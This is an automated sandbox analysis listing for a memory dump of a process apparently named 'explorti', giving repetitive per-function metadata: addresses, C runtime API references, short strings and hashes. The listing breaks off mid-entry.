Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: B211087BE001414FD604862DC9FC5FEA797EAC5321B3D437BD0514B758DA22A945D900

Function 006C645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92749c1dde0891bdb981b8e26dfbf46c2fffbc5657589ffe9d913cca5a60cccf
Instruction ID: edd56e08e5704a68a852b48b005dd97f68afc8fa7ecba54569decf20954c34a0
Opcode Fuzzy Hash: 92749c1dde0891bdb981b8e26dfbf46c2fffbc5657589ffe9d913cca5a60cccf
Instruction Fuzzy Hash: 6CE08C302406086FDF3A7B18C809EA83BABEB56349F14C818FC0486232CB25ED81CA94

Function 006CA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 23b47ff775c4f6d17048bf7e91822a79267959091b7cf817de7d6df6afb9193e
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: FFE04632911228EBCB15DBC88908E9AF2ADEB48B04F19409AB501D3A40C270DF00C7D4

Function 00692E80 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00692F1F
GetCurrentThreadId.KERNEL32 ref: 00692F3E
__Mtx_unlock.LIBCPMT ref: 00692F8C
__Cnd_broadcast.LIBCPMT ref: 00692FA3
__Mtx_unlock.LIBCPMT ref: 006930B5
GetCurrentThreadId.KERNEL32 ref: 006930F2
__Mtx_unlock.LIBCPMT ref: 0069315B

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 8b03ffa6ee45523cdfb5c46e4ee6eceee42afdc8fd5333947e502764e6cd7b19
Instruction ID: 062dc944c745227c04ff26a47b67028592800051411ef814c8ac34a2a35a2e84
Opcode Fuzzy Hash: 8b03ffa6ee45523cdfb5c46e4ee6eceee42afdc8fd5333947e502764e6cd7b19
Instruction Fuzzy Hash: 22A1A0B0A00216AFDF11EF64C9457AAB7AAFF16324F048129E815D7751EB31EE04CB91

Function 006A7870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 006A795C
__Cnd_destroy_in_situ.LIBCPMT ref: 006A7968
__Mtx_destroy_in_situ.LIBCPMT ref: 006A7971

Strings

d+o, xrefs: 006A7904, 006A7912, 006A790A
@yj, xrefs: 006A794A
'kjd+o, xrefs: 006A7879, 006A790B

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'kjd+o$@yj$d+o
API String ID: 4078500453-2337073574
Opcode ID: 52d15f294d288dcd02e19373a4af113421b75f59848d23ea3dc60fafbb5d21e2
Instruction ID: d05fb7b67d09da053f228500c16cdba4a08964b51fc7515c785befc5c395da44
Opcode Fuzzy Hash: 52d15f294d288dcd02e19373a4af113421b75f59848d23ea3dc60fafbb5d21e2
Instruction Fuzzy Hash: 5031C0B29043049BD720EF68D845A6BB7E9EF16310F000A7EE946C7742E771EE548BA5

Function 006C70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 006C710B

Strings

.com, xrefs: 006C714B
.exe, xrefs: 006C7118
.bat, xrefs: 006C713A
.cmd, xrefs: 006C7129

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: c3f681bba0c8e0d641f8776a53ca765c4fd2f95d9c72f1cb799b8004e1b9cb57
Instruction ID: 7e69bf2f4367679d60f9e230ab372e33452614672db0dd282654a6171e37e8d3
Opcode Fuzzy Hash: c3f681bba0c8e0d641f8776a53ca765c4fd2f95d9c72f1cb799b8004e1b9cb57
Instruction Fuzzy Hash: CF0108276083662616582419AC03FBF278FDB82BB471E002FF944FB7C1DE54DC0245D4

Function 00692670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00692806
___std_exception_destroy.LIBVCRUNTIME ref: 006928A0

Strings

P#i, xrefs: 00692811
P#i, xrefs: 006927BE, 00692899

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#i$P#i
API String ID: 2970364248-1653140521
Opcode ID: 816f8cd901b02cddb5748f26b7a17d44ba18563faf1ed111208116fdc5f664d9
Instruction ID: bbaa0547e3f4033abc1c43e62a7fb0a615c31ef94e11940718a4511c26183fa1
Opcode Fuzzy Hash: 816f8cd901b02cddb5748f26b7a17d44ba18563faf1ed111208116fdc5f664d9
Instruction Fuzzy Hash: 25717F71E002499FDF04DFA8C891BEDBBBAEF59310F14411DE805AB741D774A984CBA5

Function 00692AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00692B23

Strings

This function cannot be called on a default constructed task, xrefs: 00692B03
P#i, xrefs: 00692B18
P#i, xrefs: 00692B2E

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#i$P#i$This function cannot be called on a default constructed task
API String ID: 2659868963-2992938221
Opcode ID: 4cec4b2e5de8518af68255a06be03f46581462ace7e03105b153f7cd6ccc8449
Instruction ID: a32ce868470505f42558e58873c0aae16c40f5b7af3c3960ed0fe14632248f3d
Opcode Fuzzy Hash: 4cec4b2e5de8518af68255a06be03f46581462ace7e03105b153f7cd6ccc8449
Instruction Fuzzy Hash: DFF0FC7191034C5BCB10EF6998419DEBBEEDF05300F50419DF80457701EB705E448B98

Function 00692440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0069247E

Strings

'kjd+o, xrefs: 00692440
P#i, xrefs: 00692486
P#i, xrefs: 0069246D

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'kjd+o$P#i$P#i
API String ID: 2659868963-83838552
Opcode ID: 7185aac890c300f3bbe1e0e403c4f4565c11c6a7e212840addbb12c3ef6e9738
Instruction ID: 0bcc56222c6ea864bad414a5def2b5a331b3632f7e49ddc3c6d6a4650c8fd165
Opcode Fuzzy Hash: 7185aac890c300f3bbe1e0e403c4f4565c11c6a7e212840addbb12c3ef6e9738
Instruction Fuzzy Hash: AAF0A0B191034D67C714EEE4D801D89B7ADDA15300B008A29F654E7601F7B0FA5487A9

Function 006CC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006CCA37

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: 5fcefd96418873e9834d563c970ae9a612a75e12d091f72955c26ac8fd3fec7c
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 04B1F3329002859FDB15CF68C891FFEBBA6EF55360F1481AEE849EB341D6349D42CB64

Function 006ABAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 006ABAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 006ABB14
_xtime_get.LIBCPMT ref: 006ABB37
__Xtime_diff_to_millis2.LIBCPMT ref: 006ABB43

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 2a93c63c738d40f9a1acacdaceee48b1f50402f1dbad0ecf2beec9380bd9bc5f
Instruction ID: 635c8928090f637271836f19d8d538a78d966801ce8b738f0ed230705b7f1222
Opcode Fuzzy Hash: 2a93c63c738d40f9a1acacdaceee48b1f50402f1dbad0ecf2beec9380bd9bc5f
Instruction Fuzzy Hash: FD214F71E002099FDF10EFA4CC819BEBBBAEF09724F004069F601A7261DB70AD419FA5

Function 006A7040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 006A726C

Strings

`zj, xrefs: 006A7282
@.i, xrefs: 006A7250

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: @.i$`zj
API String ID: 3366076730-1876111630
Opcode ID: 0abdf204bb764c7209e761d3ecff97c09fb311f89c6a6ec0271f765ab6b613b5
Instruction ID: 38bfc23f6ab18ee46d44fa301a7efa236fcd18fc1ec73a06e152d6f39f1ce114
Opcode Fuzzy Hash: 0abdf204bb764c7209e761d3ecff97c09fb311f89c6a6ec0271f765ab6b613b5
Instruction Fuzzy Hash: 49A136B0A016198FDB21DFA8C88479EBBF2FF49710F198159E819AB351EB759D01CF90

Function 006CF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006CF263

Strings

`'o, xrefs: 006CF235
8"o, xrefs: 006CF30B

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"o$`'o
API String ID: 3903695350-933842191
Opcode ID: 32400f45af36b020cf76089e8dd93c997aab0cea0f564ba661f4129589adc935
Instruction ID: 9248d418faefcafba4a94d15fec1455e5dbff61aa11b2a86e6c0a3192fae04bd
Opcode Fuzzy Hash: 32400f45af36b020cf76089e8dd93c997aab0cea0f564ba661f4129589adc935
Instruction Fuzzy Hash: EC315C31600209AFEB61ABB8E945FBA77EBEF00314F10452DE44AD7291DF76ED808B55

Function 00693930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00693962
__Mtx_init_in_situ.LIBCPMT ref: 006939A1

Strings

pBi, xrefs: 00693940

Memory Dump Source

Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true

Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_690000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pBi
API String ID: 3366076730-1569801529
Opcode ID: 16c3e0898b53cef74d63c2cd694bc82ab7a4a4238ad9a886e09ab18084d7d685
Instruction ID: 2b12b4c3390c3dfd35f919c79d3ff4cde56762313a33dd1cf56168a815ebcf9c
Opcode Fuzzy Hash: 16c3e0898b53cef74d63c2cd694bc82ab7a4a4238ad9a886e09ab18084d7d685
Instruction Fuzzy Hash: E14114B05017059FDB20CF19C588B9ABBF6FF44315F14861DE86A8B741E7B5AA15CF80

Function 00692520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00692552

Strings

P#i, xrefs: 0069255D
P#i, xrefs: 00692547

Memory Dump Source

